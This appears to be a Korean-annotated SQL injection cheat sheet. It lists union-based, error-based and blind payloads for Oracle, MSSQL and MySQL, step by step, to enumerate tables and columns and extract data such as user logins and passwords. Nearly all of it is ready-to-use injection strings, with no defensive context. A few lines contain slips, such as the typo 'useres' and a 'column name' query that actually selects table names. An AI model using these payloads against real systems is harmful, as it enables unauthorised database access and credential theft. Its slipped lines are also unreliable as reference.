Oracle
Union SQL
' order by 1--
# 데이터 형 조회
' union select null ,null, null from dual--
' union select null, null, 123 from dual--
' union select null, null, 'abc' from dual--
# 테이블 명 조회
' union select null,table_name, null, null from all_tables--
# 컬럼 명 조회
' union select null, column_name, null, null from all_tab_columns where table_name='mytable'--
# 데이터 조회
' union select null, data, null, name from mytable--
Error Based SQL
# 테이블 개수 확인
' and ctxsys.drithsx.sn(user,(select count(table_name) from user_tables))=1 and '%1%'='%1
# 테이블 명 조회
' and ctxsys.drithsx.sn(user,(select table_name from (select table_name, rownum as rnum from user_tables) where rnum=1))=1 and '%1%'='%1
# 테이블 컬럼 갯수 조회
' and ctxsys.drithsx.sn(user,(select count(column_name) from all_tab_columns where table_name='mytable'))=1 and '%1%'='%1
# 컬럼 명 조회
' and ctxsys.drithsx.sn(user,(select column_name from (select column_name,rownum as rnum from all_tab_columns where table_name='mytable') where rnum=1))= 1 and '%1%'='%1
# 데이터 갯수 조회
' and ctxsys.drithsx.sn(user,(select count(ANSWER_COLUMN) from mytable))=1 and '%1%'='%1
# 데이터 조회
' and ctxsys.drithsx.sn(user,(select ANSWER_COLUMN from (select ANSWER_COLUMN, rownum as rnum from mytable) where rnum=1))=1 and '%1%'='%1
Blind SQL
# 테이블 개수 확인
' and (select count(table_name) from all_tables) < 74 --
# 테이블 명 조회
' and ascii(substr((select table_name from (select rownum as rnum,table_name from user_tables) where rnum=1),1,1)) < 130 --
# 컬럼 개수 조회
' and (select count(column_name) from all_tab_columns where table_name='mytable')=21 --
# 컬럼명 조회
' and ascii(substr((select column_name from (select rownum as rnum, column_name from all_tab_columns where table_name ='mytable') where rnum=1),1,1)) < 130 --
# 데이터 수 조회
' and (select count(userID) from mytable) < 324 --
# 데이터 조회
' AND ASCII(SUBSTR((SELECT userID FROM (SELECT ROWNUM AS RNUM, userID FROM mytable) WHERE RNUM=1),1,1)) < 130 --
MsSQL
Union SQL
# 컬럼 개수 파악
' union select null, null from information_schema.tables --
# 컬럼 데이터 형 파악
' union select '1234', null from information_schema.tables --
# 테이블 명 조회
' union select table_name, null from information_schema.tables --
# 컬럼 명 조회
' union select column_name, null from information_schema.columns where table_name='user' --
# 데이터 확인
' union select id, null from users --
' union select name, null from users --
' union select pass, null from useres --
MySQL
Union SQL
# 컬럼 개수 파악
' order by 24#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,@@version,11#
# 테이블 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,table_name,11 from information_schema.tables#
# 컬럼 명 조회
' or 1=2 union select 1,2,3,4,5,6,7,8,9,column_name,11 from information_schema.columns WHERE table_name='mytable'#
# 데이터 확인
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_login,11 from mytable#
' or 1=2 union select 1,2,3,4,5,6,7,8,9,user_pass,11 from mytable#
Error Based SQL
' and extractvalue(rand(),concat(0x3a,version())) and '%1%'='%1
# 데이터베이스 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 0,1))) and '%1%'='%1
# 테이블 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE table_schema="mytable" LIMIT 0,1))) and '%1%'='%1
# 컬럼 명 조회
' and extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_NAME="mytable" LIMIT 0,1))) and '%1%'='%1